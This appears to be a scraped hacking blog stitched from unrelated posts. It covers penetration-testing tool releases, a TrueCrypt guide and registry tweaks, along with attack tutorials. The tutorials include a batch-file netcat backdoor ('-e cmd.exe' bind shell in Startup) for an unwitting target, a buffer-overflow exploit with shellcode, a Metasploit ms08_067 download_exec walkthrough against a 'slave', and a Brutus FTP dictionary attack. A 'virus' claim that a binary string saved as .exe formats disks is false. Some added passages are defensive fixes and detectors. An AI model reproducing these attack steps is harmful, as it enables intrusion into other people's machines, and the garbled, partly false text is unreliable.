PenTBox is a security suite with programs like password crackers, denial-of-service testing tools like DoS and DDoS, secure password generators, honeypots and much more. It is intended for testing the security and stability of networks.

Tools included in PenTBox



Base64 encoder and decoder,
Digests for MD5,
SHA1,
SHA256 and SHA512,
Port scanner,
TCP DoS,
TCP AutoDoS,
SYN DoS,
Honeypot,
L33t Sp3@k Converter

PenTBox is programmed in Ruby, so Ruby is required; it is oriented to GNU/Linux systems but compatible with Windows, MacOS and more.

Tutorial for PenTBox

1. Download PenTBox and untar it.
2. We are using a Windows box; simply run the exe and choose from three options.
3. And you’re ready to attack or audit. Nothing much to think about or rely on.
Download PentBox Here

PenTBox is simple yet powerful. The feature I liked most is the simple honeypot…

HOW TO HACK A NETWORK COMPUTER

Now to do this you need a very innocent target! As we all know, a Trojan is very liable to be picked up by AV; what you need is Netcat, which opens a port on a computer for access (if used correctly via a batch file, you open a port on a target computer). You will need to write a batch file.


The batch file to copy Netcat onto the remote computer will have to be run from the target computer (the person on the target will have to run the batch file in some way). Open Notepad and type this in:
Code
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd “Documents and Settings”
cd “All Users”
cd “Start Menu”
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

You save the file as a batch file using Notepad. The next batch file will be used to make sure the port you specified opens up every time Windows starts up; you can specify any port you wish. Open Notepad and type this:
Code
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad; this will be the file that is copied into the startup folder by the previous batch file we wrote. You can bind the batch file to another file and share that file; let the target run that file so that it copies Netcat and the other batch file onto his/her computer, therefore opening port 9999. After port 9999 has been opened you can then use telnet to connect to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in, change the Administrator password in case something happens to your files; the command is this:

net user Administrator newpassword

Now from here you can do what you want! Example: try shutting down the target computer by browsing to the system32 folder and then typing:

shutdown -r -t 10 -c “Hello”

Then the computer will restart in 10 seconds. You can even play around more by installing Cain & Abel on your computer and then installing Abel slightly on his computer (since you know the Administrator password). Once you have Abel on the target you can start and stop services and do more!

TRUECRYPT – FILE ENCRYPTION SOFTWARE

You can get the latest version of TrueCrypt (which is version 7.0a) from here.

Once you download the .exe file and open it, you will be asked to agree to the license (which no one cares to read). On the next page of the wizard, you will be asked whether to install or extract. Let me explain: if you are planning on encrypting a drive or your boot partition, or if you are planning on using TrueCrypt solely on your computer, then choose the install option. If you are instead planning on using this tool on the go or on your flash drive, then choose the extract option, which will allow you to use this software anywhere and everywhere using the truecrypt.exe file.


Once the installation is done, do the following to make an encrypted virtual space for storing all your sensitive data:

1. After clicking the TrueCrypt icon, the main window should appear. Click the Create Volume button.

2. You will be taken to the Volume Creation Wizard. In this step you need to choose where you wish the TrueCrypt volume to be created. A TrueCrypt volume can reside in a file (also called a container), in a partition or on a drive. In this tutorial we will choose the first option and create a TrueCrypt volume within a file. As the option is already selected, just click Next.


3. In the next step, you will be asked whether to create a standard or hidden TrueCrypt volume. For more information on the hidden TrueCrypt volume, just select the ‘more info’ link on the wizard window. For now, let’s just create a standard volume.


4. In the next step, you choose the location. Note that it will be similar to any normal file (except for the fact that it can only be opened by TrueCrypt), so please remember that your TrueCrypt volume can be moved or deleted. You will also need to choose a file name for your volume after choosing the location.


Once the location is sorted, you will be asked to choose the size of your volume, the encryption scheme, a password and also the format of your volume. Choose the ones appropriate for you.


Once you click Format, you are finally done! You will be greeted with a pop-up window that says that your volume has been created.

Now all you have to do is go back to the main TrueCrypt window, select any one of the provided drive letters, click on the Select File button, select your volume and then hit Mount. You will be asked for your password; once you input that you can go to My Computer and find your TrueCrypt volume sitting there alongside your C: and D: drives. You can just move all your sensitive files to your TrueCrypt volume and once done, select Unmount from the TrueCrypt main window.

BACKTRACK LINUX 5 RELEASED – DOWNLOAD

After being in production for almost 8 months, BackTrack has been updated! It has been aptly code named – “Revolution”.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
Features:
KDE (4.6) and Gnome (2.6) desktop environment flavours
32- and 64-bit support
A basic ARM BackTrack image which can be chrooted into from Android-enabled devices.
The 32- and 64-bit images support “Forensics Mode”, which boots a forensically sound instance of BackTrack, and “Stealth Mode”, which boots without generating network traffic.

Download BackTrack5 from here: http://www.backtrack-linux.org/downloads/

DOWNLOAD BACKTRACK LINUX – BEST OPERATING SYSTEM FOR HACKERS

There are a couple of things that are essential to any hacker’s walk of life. To name a few, there’s the ubiquitous flash drive for data transfer. You have the crossover cable for even faster data transfer. There’s the Wi-Fi antenna for high gain and strong amplification. Possibly, you might find a video capture card in the computer. Of course, there’s the ubiquitous laptop and desktop computer. But what software is on these computers? Undoubtedly, you will find at least two operating systems, most often Windows and Linux. But with Linux, there are several different distributions. Is there a specific one? With hackers and crackers, there is only one Linux distro out there. It is called Backtrack.



BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.

Regardless of whether you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences, from the most savvy security professionals to newcomers to the information security field. BackTrack offers a quick and easy way to find and update the largest collection of security tools to date.

BackTrack is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is easy access to software that facilitates the exploitation of secured systems. For white-hatters, it is a penetration testing platform that finds holes in a security scheme. See, everybody wins!

Major Features
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will not enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play, ready to go!

What’s great is that this Linux distribution comes as a Live CD, so no installation is needed. However, once you experience BackTrack, you will realize that it is a must to download this operating system and install it on your laptop. At the very least, download the VMWare Virtual Appliance for BackTrack. Make sure you also install the VMWare Tools for Linux. Many features will still work in VMWare mode.

* Based on: Debian, Ubuntu
* Origin: Switzerland
* Architecture: i386
* Desktop: Fluxbox, KDE
* Category: Forensics, Rescue, Live Medium
* Cost: Free

Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
* BeEF (Browser Exploitation Framework)

It also ships a large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:

* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11, Bluetooth, RFID)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP

http://www.backtrack-linux.org/downloads

BUFFER OVERFLOW ATTACK TUTORIAL – EXAMPLE

A buffer overflow is a flaw by which a program behaves abnormally when a memory buffer is overloaded, and so writes over adjacent memory. It can be triggered by inputs that alter the way a program operates, for example inputting a very large value into a C program that does integer-based addition. A buffer overflow can lead to a program crash, memory access errors, garbage output and, worse, a breach of system security. You have probably seen prominent buffer overflow based exploits and attacks in Metaspl0it or any other spl0it framework. Why am I writing this? Well, I found an excellent article on buffer overflows by eXeCuTeR <executerx[at]gmail[dot]com> and thought you might want to have a look at it. It’s explained in quite easy language with a very basic example.
Read and learn…


Our vuln program:

———- bof.c ————–

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char str[10];
    strcpy(str, argv[1]);
    printf("Done");

    return 0;
}

———- bof.c ————–

As you see, argv[1] is copied to str (str can hold 10 characters).
Try to think: what happens when we load more than 10 bytes into str? You’ll see.

Let’s try to compile the program and load 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`
Doneniv@niv-desktop:~/Desktop$



The program ran to completion even though we loaded 12 bytes, which means 12 bytes aren’t enough to overflow the program.

Let’s try to overflow the program with 14 bytes:


niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`
Doneniv@niv-desktop:~/Desktop$



Failed. Again.

Let’s load 32 bytes this time:
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$


In case it says *** stack smashing detected *** or something that looks like that error, just go to the terminal, type sudo apt-get install gcc-3.3, and when compiling type gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we’ll look more closely at what exactly happened:


niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141


We overwrote the EIP with A’s (A = 0x41 in hex). The EIP is the Instruction Pointer; it points at the next instruction to execute.

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90 bytes (NOP = NO OPeration), and it is placed before our shellcode.
The NOPSLED helps us because we don’t have to jump to exactly the place in memory where our shellcode begins: landing anywhere in the sled slides execution down into the shellcode.


———- exploit.c ————–
#include <stdio.h>
#include <string.h>

char exploit[2048];

int main(void)
{
    int i;
    /*
     * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
     * - izik <izik@tty64.org>
     */
    char shellcode[] =
        "\x6a\x05"               // push $0x5
        "\x58"                   // pop %eax
        "\x31\xc9"               // xor %ecx,%ecx
        "\x51"                   // push %ecx
        "\xb5\x08"               // mov $0x8,%ch
        "\x68\x64\x72\x6f\x6d"   // push $0x6d6f7264
        "\x68\x65\x76\x2f\x63"   // push $0x632f7665
        "\x68\x2f\x2f\x2f\x64"   // push $0x642f2f2f
        "\x89\xe3"               // mov %esp,%ebx
        "\xcd\x80"               // int $0x80
        "\x89\xc3"               // mov %eax,%ebx
        "\xb0\x36"               // mov $0x36,%al
        "\x66\xb9\x09\x53"       // mov $0x5309,%cx
        "\xcd\x80"               // int $0x80
        "\x40"                   // inc %eax
        "\xcd\x80";              // int $0x80

    for (i = 0; i < 512; i++)
        strcat(exploit, "0x90");

    strcat(exploit, shellcode);

    printf("Loaded.\n");

    return 0;
}
———- exploit.c ————–

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.


Run our vuln program so we can find the RET, the address of our shellcode.
After we run it, we’ll look at the ESP: the ESP points to the last element used on the stack.
Check this out:


niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp


You’re gonna get output like this:

0xbf949694: “`???}_???o??02″
(gdb)
0xbf9496a2: “”



etc.
Keep searching until you see something like this:

0xbf9496e0:”7?\224?J?\224?U?\224?i?\224?y?\224??\224?02?\224?24?\224?*?\224?3?\224???\224??\224?\v?\224?30?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?25?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?24?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?”



0xbf9496e0 is the address of our shellcode (the RET).
To make our exploit work properly, we need to overwrite the EIP with the address of our shellcode. We’ll take our address (0xbf9496e0) and do this:

Take the address and split it into bytes: bf 94 96 e0
Grab the last byte (e0) and do the following:
we’ll wrap each byte between \’s (backslashes) and add an x in front of each one -> \xe0\
do the same for every pair of characters and then put them in reverse order, so that the last byte of our address becomes the first one in our new address (x86 is little-endian):

0xbf9496e0 -> \xe0\x96\x94\xbf



Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A’s),
and our RET is 4 bytes long, we subtract the length of our shellcode address (the RET) from the A’s,
and we print 28 A’s (32 A’s – 4 bytes (RET’s length) = 28) followed by the RET so we can reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf "\xbf\x94\x96\xe0"`
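As an added example (mine, not code from the original article or from eXeCuTeR), here is bof.c with the unbounded strcpy replaced by a bounded copy, so the same 10-byte stack buffer refuses, or alternatively truncates, any argument that does not fit; the helper names copy_bounded, copy_truncating and handle_input are my own. The "stack smashing detected" message the tutorial works around by switching to gcc-3.3 is GCC's stack protector (-fstack-protector) catching exactly this overwrite of the saved return address, so on a real build you keep the protector on and fix the copy:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Same buffer size as the original bof.c */
#define STR_LEN 10

/* Bounded replacement for strcpy(str, argv[1]) (helper name is this
 * example's own). Copies src into dst only if it fits together with the
 * terminating NUL. Returns 0 on success, -1 if src is too long; dst is
 * then left as an empty string rather than partially written. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0)
        return -1;
    if (n >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);        /* n + 1 includes the NUL, already checked */
    return 0;
}

/* Alternative policy: keep what fits and drop the rest. snprintf always
 * NUL-terminates, unlike strncpy. Returns 1 if truncation happened, else 0. */
int copy_truncating(char *dst, size_t dst_size, const char *src)
{
    int written = snprintf(dst, dst_size, "%s", src);
    return written < 0 || (size_t)written >= dst_size;
}

/* Hardened version of the original main() body: the 10-byte stack buffer is
 * unchanged, but an argument that does not fit is refused instead of being
 * written past the end of str and over the saved return address.
 * Returns 0 when accepted, 1 when too long, 2 when no argument was given. */
int handle_input(const char *arg)
{
    char str[STR_LEN];
    if (arg == NULL)
        return 2;                   /* the original dereferenced argv[1] unchecked */
    if (copy_bounded(str, sizeof str, arg) != 0)
        return 1;                   /* too long: this is the case that overflowed */
    return 0;
}

int main(int argc, char *argv[])
{
    int rc = handle_input(argc > 1 ? argv[1] : NULL);
    if (rc == 0)
        printf("Done\n");
    else
        fprintf(stderr, "rejected: argument missing or longer than %d bytes\n", STR_LEN - 1);
    return rc;
}
```

Compile with gcc -Wall -fstack-protector-all and run it with the same 32-byte argument: the program now exits with status 1 instead of crashing. strncpy is not a drop-in fix because it does not NUL-terminate when the source is too long, which is why the truncating variant uses snprintf instead.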

HOW TO OPTIMIZE BROADBAND & DSL CONNECTIONS SPEED

These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP.


Open your registry and find the key below.

Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on ‘Edit -> New -> DWORD Value’ and then set the value as shown below.

DefaultTTL = "80" hex (or 128 decimal)
Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.

EnablePMTUBHDetect = "0"
Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.

EnablePMTUDiscovery = "1"
Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.

GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the system maximum receive window size advertised by the TCP/IP stack.

TcpMaxDupAcks = "2"
Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before “fast retransmit” is triggered.

SackOpts = "1"
Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.

Tcp1323Opts = "1"
Controls RFC 1323 time stamps and window scaling options. Possible values are: "0" = disable RFC 1323 options, "1" = window scale enabled only, "2" = time stamps enabled only and "3" = both options enabled.

TcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the receive window size advertised by the TCP/IP stack. If you have a high-latency network you can try increasing the value to 93440, 186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.

If you don’t want to edit the registry, here’s a little TCP utility that is ideal…

http://www.broadbandreports.com/front/doctorping.zip

HOW TO CREATE A VIRUS IN WINDOWS

Here I am gonna tell you how to create a simple virus on Windows computer systems. It is a very simple trick and you can do it in just a minute.

HOW TO : Create A Virus In Windows


1. Copy the number given below and paste it in a Notepad file

01001011000111110010010101010101010000011111100000

2. Now save the file as any name and put the extension as .exe like, ‘whateveryouwish.exe’

3. When somebody opens this file, the hard disk will be formatted.

For more fun, you can keep this file in a far-off folder on any computer you can access. For that, first rename the file and make a shortcut to it on the desktop. Now hide the original file and change the icon of the shortcut to that of My Computer, My Documents or any other popular icon. Rename it accordingly and delete the original icon and link from the desktop. Now when someone tries to open it, the hard disk will format…

HACK THE GAME – LEARN HACKING WITH IT

Hack The Game is a small, free game which will let you enjoy the real world of hacking. It gives you a DOS environment to play in, which will make you feel that you are really hacking something. It also has lots of typing sounds and several warning announcements, which make the gaming experience more realistic.

Download HACK THE GAME


After downloading, just start it, select your language and input any ID you like. You will find many missions in this game; a briefing for each mission will be available in your inbox. The mail itself includes several hints and processes on how to hack. You can also check Settings to turn off the sounds and warning messages, etc.

The best thing is that no installation is needed to run this game and it is totally safe to play, as it uses local files which act as remote files in the game play. So, you just don’t need to worry about your security. If you have doubts about it, then just play it offline…. Enjoy

CREATING TROJAN BINARY USING METASPLOIT

Learn how to create a standalone Trojan binary using the Metasploit Framework. We use msfpayload option to output raw data, which we then encode via msfencode. Finally, we pipe it to a new executable file.

Watch Video

BACKBOX LINUX 1.05 – DOWNLOAD

BackBox is a Linux distribution based on Ubuntu Lucid 10.04 LTS, developed to perform penetration tests and security assessments. It is designed to be fast and easy to use, and to provide a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable version of the best-known and most-used ethical hacking tools.
This is the official change log:
New ISO image (32bit & 64bit)
System upgrade
Performance boost
New look and feel
Improved start menu
Bug fixing
Hacking tools new or updated: Firefox 4, Hydra 6.2, Kismet 2011.03.2, Metasploit Framework 3.6.0, Nmap 5.51, SET 1.3.5, Wireshark, W3af 1.0

Download BackBox Linux 1.05 from here: http://www.backbox.org/content/download

METASPLOIT FRAMEWORK V3.7.0 RELEASED – DOWNLOAD

The Metasploit team has spent the last two months focused on one of the least visible, but most important pieces of the Metasploit Framework: the session backend. Metasploit 3.7 represents a complete overhaul of how sessions are tracked within the framework and associated with the backend database. This release also significantly improves the staging process for the reverse_tcp stager and Meterpreter session initialization. Shell sessions now hold their output in a ring buffer, which allows us to easily view session history, even if you don’t have a database.
This release also includes a long-awaited update to our SMB stack to enable signing.
Thanks to some great work by Alexandre Maloteaux, you can now perform pass-the-hash and stolen password attacks against Windows 2008. Alexandre also added NTLM authentication support to the Microsoft SQL Server driver within Metasploit.


In addition to the core library improvements, this release comes with 35 new remote exploits thanks in large part to our two newest full time developers, bannedit and sinner.

Download Metasploit Framework 3.7.0 from here: http://www.metasploit.com/download/

RAWCAP – A COMMAND LINE NETWORK SNIFFER FOR WINDOWS

RawCap is a free command line network sniffer for Windows that uses raw sockets. This means that you won’t need external drivers such as WinPcap anymore! It can also sniff WiFi networks! All this in a file that is just 17 kB.



You might ask what good this might do for you. The answer is simple. If you find a way to compromise a perimeter device running Windows, you can upload this small utility there and then view the dump file at your leisure to sniff its internal traffic! Since it works at the raw socket level, you can sniff anything, right from an SSL connection to a WPA2-encrypted WiFi connection. This can be helpful to incident responders and penetration testers alike.
Features of RawCap:
Can sniff any interface that has got an IP address, including 127.0.0.1 (localhost/loopback)
RawCap.exe is just 17 kB
No external libraries or DLLs needed other than .NET Framework 2.0
No installation required, just download RawCap.exe and sniff
Can sniff most interface types, including WiFi and PPP interfaces
Minimal memory and CPU load
Reliable and simple to use
You will need to have administrator privileges to run RawCap. Additionally, it might not run on a Windows 7 or Windows Vista machine.


Launch RawCap.exe and follow its prompts, or simply run:


RawCap.exe 192.168.0.17 dumpfile.pcap

This tool has currently been tested on Windows XP.

Download RawCap from here: Rawcap

ARMITAGE 03.16.11 – CYBER ATTACK TOOL FOR METASPLOIT

This is the change log:
Shell-> Disconnect now executes in a separate thread.
Armitage now creates ~/armitage-tmp and writes there if the current directory is /Applications or it can’t write to the current directory.
Fixed a potential deadlock issue in the file browser
Directory up button in file browser now shows that it has been pressed
Added Execute option to file browser (now you can run a program by right-clicking on it and selecting Execute; for Jesse)
Multiple improvements to responsiveness of command shell and meterpreter tabs. This should benefit collaboration mode too.

Download Armitage from here: download

IMMUNITY DEBUGGER V1.82 – TOOL TO WRITE EXPLOITS, ANALYZING MALWARE & REVERSE ENGINEERING

Immunity Debugger is a powerful way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.


Features:
A debugger with functionality designed specifically for the security industry
Cuts exploit development time by 50%
Simple, understandable interfaces
Robust and powerful scripting language for automating intelligent debugging
Lightweight and fast debugging to prevent corruption during complex analysis
Connectivity to fuzzers and exploit development tools
Better handling of breakpoints.
Fix thread suspend issues while handling breakpoints
Reintroduced the Python shell
Fixed python tracebacks to work again.

Download Immunity Debugger from here: Download

ARMITAGE – CYBER ATTACK MANAGEMENT TOOL FOR METASPLOIT

Armitage is a cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.



Requirement to install Armitage:
Java 1.6.0+
Metasploit 3.5+
A database and the information to connect to it

Download Armitage from here: http://www.fastandeasyhacking.com/download

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT – INFECTING THROUGH IP ADDRESS

Requirements:


Nmap
Metasploit

First of all you need the target IP of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to a database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait about 5 minutes for the scan to complete.
Once done, note down the OS, ports, and services running on the slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get Win XP or 2000 as the OS, because they’re easy to exploit.

No matter whether they’re protected by a firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control your slave with a RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case you didn’t get these two OSes, immediately after the Nmap scan

you can use the command db_autopwn -p -t -e.
In most cases you get a shell.

Good Luck!

WINAUTOPWN – VERSION 2.4 – DOWNLOAD

This is to announce the release of winAUTOPWN version 2.4…


winAUTOPWN is an automated (hacking) shell-gaining tool. It can also be used to test IDS, IPS and other monitoring sensors/software…

Download from here

WHAT ARE DICTIONARY ATTACKS

You must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus here.

1. First the hacker would choose a target. In this case it’s my home computer; the IP address of your own home computer (localhost) is 127.0.0.1.

2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.


3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.


5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.

7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/

8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.


9. If you’re lucky, eventually it’ll get the right Username:Password combination.


10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.


11. In place of the IP address 127.0.0.1 would be the hacker’s IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.
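The log footprint in steps 10 and 11 is what a defender watches for. As an added example (not from the book excerpt above or from Brutus), here is a small C detector that reads vsftpd-style login lines, counts failed logins per client address and flags a source once it crosses a threshold. The log lines are constructed, and the function names parse_failed_login, count_failures_from and is_brute_force are this example's own:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define IP_MAX 64
#define FAIL_MARKER "FAIL LOGIN: Client \""

/* Extract the client IP from one vsftpd-style "FAIL LOGIN" line.
 * Returns 1 and fills ip_out when the line records a failed login, else 0.
 * Successful logins ("OK LOGIN") and unrelated lines return 0. */
int parse_failed_login(const char *line, char *ip_out, size_t out_size)
{
    const char *p = strstr(line, FAIL_MARKER);
    if (p == NULL)
        return 0;
    p += strlen(FAIL_MARKER);
    const char *end = strchr(p, '"');
    if (end == NULL)
        return 0;
    size_t len = (size_t)(end - p);
    if (len == 0 || len >= out_size)
        return 0;                       /* malformed or over-long address */
    memcpy(ip_out, p, len);
    ip_out[len] = '\0';
    return 1;
}

/* Count failed logins attributed to one client IP across a batch of lines. */
int count_failures_from(const char *const *lines, size_t n, const char *ip)
{
    char addr[IP_MAX];
    int count = 0;
    for (size_t i = 0; i < n; i++)
        if (parse_failed_login(lines[i], addr, sizeof addr) && strcmp(addr, ip) == 0)
            count++;
    return count;
}

/* Threshold rule: an IP with `threshold` or more failures in the batch is
 * treated as a dictionary / brute-force source. */
int is_brute_force(const char *const *lines, size_t n, const char *ip, int threshold)
{
    return count_failures_from(lines, n, ip) >= threshold;
}

/* Constructed sample log (not from the article): one client cycling through
 * usernames, one client with a single typo, and two successful logins. */
static const char *const SAMPLE_LOG[] = {
    "Sun Nov 13 10:01:02 2011 [pid 1201] [admin] FAIL LOGIN: Client \"203.0.113.7\"",
    "Sun Nov 13 10:01:03 2011 [pid 1202] [root] FAIL LOGIN: Client \"203.0.113.7\"",
    "Sun Nov 13 10:01:03 2011 [pid 1203] [ftp] FAIL LOGIN: Client \"203.0.113.7\"",
    "Sun Nov 13 10:01:04 2011 [pid 1204] [test] FAIL LOGIN: Client \"203.0.113.7\"",
    "Sun Nov 13 10:01:05 2011 [pid 1205] [bob] OK LOGIN: Client \"192.0.2.5\"",
    "Sun Nov 13 10:01:06 2011 [pid 1206] [alice] FAIL LOGIN: Client \"198.51.100.9\"",
    "Sun Nov 13 10:01:07 2011 [pid 1207] [alice] OK LOGIN: Client \"198.51.100.9\"",
    "Sun Nov 13 10:01:08 2011 [pid 1208] [guest] FAIL LOGIN: Client \"203.0.113.7\"",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* Convenience wrapper over the constructed sample. */
int sample_failures(const char *ip)
{
    return count_failures_from(SAMPLE_LOG, SAMPLE_LOG_LEN, ip);
}

int main(void)
{
    const char *suspects[] = { "203.0.113.7", "198.51.100.9", "192.0.2.5" };
    for (size_t i = 0; i < 3; i++)
        printf("%-14s failures=%d brute-force=%s\n", suspects[i],
               sample_failures(suspects[i]),
               is_brute_force(SAMPLE_LOG, SAMPLE_LOG_LEN, suspects[i], 5) ? "yes" : "no");
    return 0;
}
```

In a real deployment the batch would be a sliding time window rather than a whole file, and the distinct usernames tried per source (visible in the bracketed field) are a second strong signal, since step 6 above is exactly a walk through a list of common usernames.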

PRORAT – TROJAN

To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat.


